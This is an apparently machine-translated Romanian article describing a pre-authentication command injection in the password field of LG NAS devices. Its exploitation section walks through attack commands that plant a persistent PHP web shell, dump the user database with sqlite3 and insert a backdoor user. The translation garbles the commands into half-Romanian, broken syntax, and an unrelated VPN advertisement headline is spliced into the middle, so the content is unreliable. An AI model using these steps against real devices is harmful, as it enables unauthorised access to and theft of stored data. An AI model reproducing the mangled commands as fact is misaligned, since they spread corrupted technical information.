Vulnerabilitate critică găsită în majoritatea dispozitivelor LG NAS

Prezentare generală:

Am efectuat o evaluare cuprinzătoare pe un dispozitiv LG NAS. Acest dispozitiv este un dispozitiv de stocare conectat la o rețea care permite utilizatorilor autorizați numai. Este ca un nor privat, doar că costă mai puțin, este simplu de operat și vă oferă un control complet. in orice caz, am găsit o modalitate de a pirata în sistem folosind o vulnerabilitate injectabilă de comandă de la distanță pre-autentificată (CVE-2023-10818), care ne poate permite apoi să facem practic totul, inclusiv accesul la date și modificarea datelor și conținutului utilizatorului.. 

Exploatare:

Vulnerabilitatea (CVE-2023-10818) este o vulnerabilitate la injecția de comandă de la distanță, prealabilă, găsită în majoritatea dispozitivelor LG NAS.

Așa cum arată în videoclip, nu puteți pur și simplu să vă autentificați cu niciun nume de utilizator și parolă aleatorii. Cu toate acestea, există o vulnerabilitate la injectarea comenzii în parametrul „parolă” (trebuie să folosiți un interceptor precum burp). Putem pur și simplu să declanșăm acest bug adăugându-l. Pentru a adăuga un utilizator nou, putem scrie pur și simplu un shell persistent numit c.php folosind:
; ecou „” > / tmp / x2; sudo mv / tmp / x2 /var/www/c.php
Introducerea ei ca parolă exploatează vulnerabilitatea.

Apoi, trecând următoarea comandă, putem „arunca” utilizatorii:
ecou „utilizator .dump” | sqlite3 /etc/nas/db/share.db
Deconectarea înseamnă citirea tuturor datelor bazei de date. Dăm baza de date pentru a putea vedea numele de utilizator și parolele utilizatorilor. Acest lucru ne permite să adăugăm și noi.

Pentru a adăuga un utilizator nou în baza de date, trebuie să generăm un MD5 valid. Putem folosi instrumentul MD5 inclus pentru a crea un hash cu numele de utilizator „test” și parola „1234.”
sudo nas-comun md5 1234
Odată ce avem o parolă validă și un nume de utilizator, o putem adăuga la baza de date cu următoarele:
INSERTĂ ÎN VALORILE „utilizatorului” („test”, „md5_hash”, „Test Vuln”, „test @ localhost”, ”);
După finalizarea acesteia, ne putem conecta la LG Network Storage cu testul de utilizator și parola 1234.

  5 cele mai bune VPN-uri pentru overwatch-ul care funcționează în 2023 [și reduce timpul de lag]

Acest lucru ne oferă acces la sistem ca utilizator autorizat. De aici putem accesa orice date sau fișiere clasificate care sunt stocate pe dispozitivul LAS.

recomandări:

  • Fiți conștienți că dispozitivele LAS pot fi hackate și exploatate.
  • Contactați LG și anunțați-le despre această vulnerabilitate și cereți să o remedieze.
  • Avertizați-vă prietenii pe facebook (aici este un link) sau pe twitter (faceți clic pentru a twittea)